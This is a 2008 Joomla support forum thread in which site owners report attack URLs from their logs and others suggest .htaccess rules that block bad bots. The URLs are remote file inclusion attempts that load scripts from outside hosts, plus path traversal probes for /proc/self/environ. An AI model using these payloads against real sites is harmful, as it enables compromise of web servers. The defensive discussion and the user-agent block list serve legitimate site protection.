Change font size Change Width
Advanced Search
 

Joomla! Discussion Forums



It is currently Tue Nov 24, 2009 9:28 am (All times are UTC )

 

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Forum rules

Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 12 posts ] 
  Print view Previous topic | Next topic 
Author Message
ased
Posted: Mon Aug 11, 2008 12:57 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Mon Oct 02, 2006 9:33 pm
Posts: 17
Hi,

I found this in my site and i wounder whats going on , i'm using MyBlog from azrul as front page , when i put these links in the browser they took me to my front page but there are links to other sites !
How they done it ?
How to delet it and avoid it in the future.

Thanks for your help

The links :

mysite.com/index.php?view=page&amp;pagename=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt???

mysite.com/index.php?view=page&amp;pagename=http://student-x.com/test.txt?

.mysite.com/index.php?autoLoadConfig[333][0][autoType]=include&amp;autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt???

mysite.com/index.php?view=page&amp;pagename=http://www.mubune.com/plugins/safehtml/oye.txt??
Top
  E-mail  
 
wildazzjw
 Post subject: Re: hack attempt
Posted: Mon Sep 15, 2008 2:15 am 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Thu Oct 12, 2006 4:07 am
Posts: 3
I also have this activity in my logs. A google search vaguely shows this as some sort of hack. Maybe for ZenCart? Not sure able to tell if anything was exploited. Does this work on Joomla?

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
Top
   
 
mandville
Posted: Mon Sep 15, 2008 2:31 am 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3682
Location: The Girly Side of Joomla in Sussex
it MIGHT do but my guess it was being called using the libwww bot, ban that in your htaccess and it should dramatically clear up these types of attacks

_________________
HU2HY - GIGO - Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Avez-vous lu les instructions ? Avez-vous recherché ?

Top
   
 
Jane Blonde
Posted: Mon Sep 29, 2008 10:33 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Sat Aug 02, 2008 2:42 pm
Posts: 21
how do I ban that, what is exact code

Code:
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot


That's what I found with google but is that it?

Should we ban other stuff too?

J
Top
  E-mail  
 
mandville
Posted: Mon Sep 29, 2008 11:12 am 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3682
Location: The Girly Side of Joomla in Sussex
thats basically correct , if you search this forum especially sxome of my posts, you will see the htaccess code i use to ban this and other bad bots

_________________
HU2HY - GIGO - Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Avez-vous lu les instructions ? Avez-vous recherché ?

Top
   
 
mandville
Posted: Mon Sep 29, 2008 10:09 pm 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3682
Location: The Girly Side of Joomla in Sussex
this is the sort of full htaccess code i meant, adapt to your own use.
Code:
SetEnvIfNoCase User-Agent “^FlashGet” bad_bot
SetEnvIfNoCase User-Agent “^GetRight” bad_bot
SetEnvIfNoCase User-Agent “^GetWeb!” bad_bot
SetEnvIfNoCase User-Agent “^Go!Zilla” bad_bot
SetEnvIfNoCase User-Agent “^httplib” bad_bot
SetEnvIfNoCase User-Agent “^Indy Library” bad_bot
SetEnvIfNoCase User-Agent “^InfoNaviRobot” bad_bot
SetEnvIfNoCase User-Agent “^InterGET” bad_bot
SetEnvIfNoCase User-Agent “^Internet Ninja” bad_bot
SetEnvIfNoCase User-Agent “^LexiBot” bad_bot
SetEnvIfNoCase User-Agent “^libWeb/clsHTTP” bad_bot
SetEnvIfNoCase User-Agent “^libwww” bad_bot
SetEnvIfNoCase User-Agent “^libwww-perl” bad_bot
SetEnvIfNoCase User-Agent “^LinkextractorPro” bad_bot
SetEnvIfNoCase User-Agent “^Mozilla.*NEWT” bad_bot
SetEnvIfNoCase User-Agent “^Octopus” bad_bot
SetEnvIfNoCase User-Agent “^ProWebWalker” bad_bot
SetEnvIfNoCase User-Agent “^SuperBot” bad_bot
SetEnvIfNoCase User-Agent “^WebAuto” bad_bot
SetEnvIfNoCase User-Agent “^Wells Search II” bad_bot
SetEnvIfNoCase User-Agent “^Wget” bad_bot
SetEnvIfNoCase User-Agent “^wget” bad_bot
<Limit GET POST>
order allow,deny
allow from all
deny from env=bad_bot
</Limit>

_________________
HU2HY - GIGO - Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Avez-vous lu les instructions ? Avez-vous recherché ?

Top
   
 
Jane Blonde
Posted: Tue Sep 30, 2008 10:42 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Sat Aug 02, 2008 2:42 pm
Posts: 21
Wow! Now your talking, that's great Mandivile, I feel a lot safer!

When I searched your posts for .htaccess I mostly got this one!

JB
Top
  E-mail  
 
mandville
Posted: Tue Sep 30, 2008 11:08 am 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3682
Location: The Girly Side of Joomla in Sussex
NP - make sure mod_rewrite is on.
you will notice that a lot of libwww will start appearing in your logs marked "denied by server" or similar

_________________
HU2HY - GIGO - Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Avez-vous lu les instructions ? Avez-vous recherché ?

Top
   
 
Jane Blonde
Posted: Tue Sep 30, 2008 11:39 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Sat Aug 02, 2008 2:42 pm
Posts: 21
Code:
RewriteEngine On

:)
Top
  E-mail  
 
mandville
Posted: Fri Oct 03, 2008 4:41 pm 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3682
Location: The Girly Side of Joomla in Sussex
just thought i would check if this code has helped and if not any other issues arised?

_________________
HU2HY - GIGO - Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Avez-vous lu les instructions ? Avez-vous recherché ?

Top
   
 
Jane Blonde
Posted: Fri Oct 03, 2008 5:41 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Sat Aug 02, 2008 2:42 pm
Posts: 21
I have not had a problem since and am implementing it on other Joomla sites, thanks:)
Top
  E-mail  
 
guysmiley
Posted: Sat Nov 15, 2008 1:20 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Mon Sep 12, 2005 7:22 pm
Posts: 454
Location: Ontario, Canada
Greetings,

Thanks for this list ;)

If modsecurity is already catching it, am I burdening the server unnecessarily by adding these lines to my .htaccess?

IOW, should I add these lines to .htaccess if modsecurity is already nabbing them?

Thanks!
Top
   
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 12 posts ] 

Quick reply

 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 20 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
 
 
 
 
 

© 2005-2009 Open Source Matters, Inc. All rights reserved. Joomla hosting by Rochen Ltd.